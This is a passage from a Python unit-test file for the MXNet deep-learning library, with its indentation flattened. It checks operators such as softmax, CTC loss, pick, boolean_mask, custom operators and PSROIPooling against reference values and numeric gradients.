ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
